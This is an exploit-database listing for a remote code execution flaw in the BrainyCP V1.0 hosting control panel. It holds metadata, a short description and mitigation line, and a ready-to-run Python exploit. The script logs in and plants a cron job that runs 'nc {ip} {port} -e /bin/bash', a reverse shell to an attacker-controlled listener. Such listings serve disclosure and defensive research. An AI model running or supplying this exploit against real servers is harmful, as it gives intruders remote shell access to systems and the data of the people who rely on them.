BrainyCP V1.0 - Remote Code Execution

vendor:

BrainyCP

by:

Ahmet Ümit BAYRAM

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: BrainyCP

Affected Version From: V1.0

Affected Version To: V1.0

Patch Exists: NO

Related CWE:

CPE: a:brainycp:brainycp:1.0

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2023

BrainyCP V1.0 – Remote Code Execution

BrainyCP is vulnerable to remote code execution due to improper input validation. An attacker can exploit this vulnerability by sending a malicious payload to the application. This payload will be executed on the server, allowing the attacker to gain access to the system.

Mitigation:

Input validation should be implemented to prevent malicious payloads from being executed.

Source

Exploit-DB raw data:

# Exploit Title: BrainyCP V1.0 - Remote Code Execution
# Date: 2023-04-03
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://brainycp.io
# Demo: https://demo.brainycp.io
# Tested on: Kali Linux
# CVE : N/A

import requests

# credentials
url = input("URL: ")
username = input("Username: ")
password = input("Password: ")
ip = input("IP: ")
port = input("Port: ")

# login 
session = requests.Session()
login_url = f"{url}/auth.php"
login_data = {"login": username, "password": password, "lan": "/"}
response = session.post(login_url, data=login_data)
if "Sign In" in response.text:
    print("[-] Wrong credentials or may the system patched.")
    exit()


# reverse shell 
reverse_shell = f"nc {ip} {port} -e /bin/bash"

# request
add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"
add_cron_data = {
    "cron_freq_minutes": "*",
    "cron_freq_minutes_own": "",
    "cron_freq_hours": "*",
    "cron_freq_hours_own": "",
    "cron_freq_days": "*",
    "cron_freq_days_own": "",
    "cron_freq_months": "*",
    "cron_freq_weekdays": "*",
    "cron_command": reverse_shell,
    "cron_user": username,
}
response = session.post(add_cron_url, data=add_cron_data)

print("[+] Check your listener!")